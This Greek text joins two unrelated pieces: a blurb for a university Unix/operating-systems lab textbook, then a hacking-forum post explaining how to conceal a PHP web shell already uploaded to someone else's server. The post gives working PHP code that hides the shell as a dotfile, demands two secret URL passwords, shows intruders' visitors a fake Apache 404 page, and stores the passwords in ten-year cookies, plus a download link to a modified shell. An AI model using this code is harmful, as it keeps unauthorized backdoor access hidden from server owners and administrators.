Το βιβλίο αποτελεί έναν αναλυτικό εργαστηριακό οδηγό (και όχι μόνο) για τους φοιτητές που παρακολουθούν το μάθημα "Εισαγωγή στα Λειτουργικά Συστήματα". Η φιλοσοφία του μαθήματος (με βάση τον νέο οδηγό σπουδών του τμήματος Μηχ. Πληροφορικής) είναι να εισάγει τον φοιτητή στις βασικές έννοιες των Λειτουργικών συστημάτων (διεργασίες, μνήμη, σύστημα αρχείων κτλ) μέσα από την χρήση του UNIX (Linux) και του shell. Σκοπός δεν είναι η εκμάθηση ενός πλήθους εντολών του Unix, αλλά η κατανόηση του τρόπου με τον οποίο οι εφαρμογές (εντολές) αλληλεπιδρούν μεταξύ τους και με τον πυρήνα του λειτουργικού συστήματος. Αυτό αναπόφευκτα γίνεται μέσα από την εκμάθηση κάποιων εντολών και του τρόπου λειτουργίας του κελύφους (shell) μέσα από τον προγραμματισμό στο κέλυφος. Με το πέρας του μαθήματος ο φοιτητής θα πρέπει να έχει κατανοήσει την φιλοσοφία λειτουργίας ενός λειτουργικού συστήματος (στην περίπτωσή μας το unix) όπως επίσης και να εξοικειωθεί με την χρήση των γραμμών εντολών (και όχι υποχρεωτικά με την χρήση γραφικών επιφανειών χρήσης και μεθόδων "drag & drop". Αποτελείται από: Εισαγωγή στα Λειτουργικά Συστήματα και το Unix Εισαγωγή στη χρήση του shell και σύνταξη εντολών Εισαγωγή στο σύστημα αρχείων shell wildcards για την διαχείριση των αρχείων Άδειες χρήσης συστήματος αρχείων Κανονικές Εκφράσεις (Regular Expressions) Διεργασίες, ανακατεύθυνση, διασωλήνωση, φίλτρα Εισαγωγή στα σενάρια φλοιού (bash) Ο επεξεργαστής vi Το αρχείο /etc/passwd και το /etc/group Εισαγωγή στα Λειτουργικά Συστήματα.pdf Πηγή: «Κάλλιπος»

Γεια σας! Σήμερα θα σας δείξω μερικά βήματα έτσι ώστε να κάνετε (σχεδόν) αόρατο το shell σας που πιθανώς έχετε ανεβάσει κάπου![hide]1. Κάνουμε rename το shell μας σε μορφή .onoma.php πχ αν ήταν: shell.php το κάνουμε .shell.php έτσι ώστε να μην εμφανίζεται με την εντολή ls σκέτη. 2. Λοιπόν εδώ θεωρούμε 2 κωδικούς τους οποίους ξέρουμε μόνο εμείς. Εγώ θα χρησιμοποιήσω τους κωδικούς: pass1 και pass2 Ανοίγουμε το php shell μας και ορίζουμε τις μεταβλητές με τον κωδικό μας πάνω πάνω: $p1 = "pass1"; $p2 = "pass2"; Στο shell αν δεν είναι της μορφής server.com/.shell.php?pass1=pass2 θα πετάει 404 error έτσι ώστε να μην καταλάβει κανείς τίποτα..δηλαδή αν πάει να μπει κάποιος έτσι: server.com/shell.php θα του πετάξει 404 error.Αυτό θα γίνει μέσω php, πάμε και γράφουμε λίγο php κώδικα: if($_GET['p1'] == $p1 && $_GET['p2'] == $p2) { //Kwdikas tou shell edw } else { //Edw einai o kwdikas gia to 404 Not Found?> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL <?echo $_SERVER['SCRIPT_NAME']?> was not found on this server.</p> <hr> <address>Apache/2.4.7 (Ubuntu) Server at localhost Port 80</address> </body></html> <?}?> Επειδή όμως σε μερικά shell ίσως να μην υπάρχει ομαλή λειτουργία(μπορεί όταν πατάνε πχ το κουμπί για την επεξεργασία ή προβολή αρχείου να <<βγαίνει>> το &p1=pass1&p2=pass2 απ το λινκ μας(δηλαδη η ταυτοποιηση του κωδικου μας) με αποτέλεσμα να μας πετάει πάλι στο 404 Not Found, θα προστέσουμε λίγο ακόμα κώδικα έτσι ώστε να μπαίνουν σε cookie οι κωδικοί και να μην ξαναχρειαστεί να τους βάλουμε στο link.Έτσι λοιπόν προσθέτουμε μετά το if($_GET['p1'] == $p1 && $_GET['p2'] == $p2) { τον εξής κώδικα: if($_COOKIE['p1'] != $p1) { //Dhladh an o xrhsths auth thn stigmh exei tous kwdikous sto link kai oxi se cookie setcookie("p1",$_GET['p1'], time() + (10 * 365 * 24 * 60 * 60)); setcookie("p2",$_GET['p2'], time() + (10 * 365 * 24 * 60 * 60)); }και ύστερα κάνουμε μια τροποποίηση στην if() έτσι ώστε να ελέγχει για cookie εναλλακτικά(αν δεν υπάρχουν οι κωδικοί στο link): if(($_GET['p1'] == $p1 && $_GET['p2'] == $p2) || ($_COOKIE['p1'] == $p1 && $_COOKIE['p2'] == $p2)) { και τέλος!Ας κάνουμε έναν έλεγχο.. Link: .madspot.php: 404 error και λογικό αφού δεν έχουμε βάλει κωδικο.. Link: .madspot.php?p1=pass1&p2=pass2 Τώρα αφού βάλαμε τους κωδικούς φόρτωσε το shell και ταυτόχρονα πέρασε τους κωδικούς μας σε cookie, πάμε να δοκιμάσουμε πάλι σκέτο link: Link: .madspot.php(μετά απ' το όρισμα των κωδικών): Τώρα βλέπουμε πως λειτουργεί κανονικά αφού έχουν οριστεί σε cookie οι κωδικοί μας και δεν χρειάζεται πλέον να τους βάζουμε στο link. Screenshot από τον server εκτελόντας την εντολή ls: Όπως βλέπετε με την εντολή ls σκέτη δεν εμφανίζεται το shell αφού ξεκινάει από . (κρυφό αρχείο) Αυτό ήταν! Αν σας μπέρδεψα μπορείτε να κατεβάσετε μια έτοιμη τροποποίηση που έκανα στο Madspot Shell: http://www.mediafire.com/download/dcgj5eh360rg3s4/modified_madspot_kwnos100.rar [/hide]Η μέθοδος είναι δικιά μου και ανήκει στο GreekHacking.com Ότι απορία έχετε αφήστε σχόλιο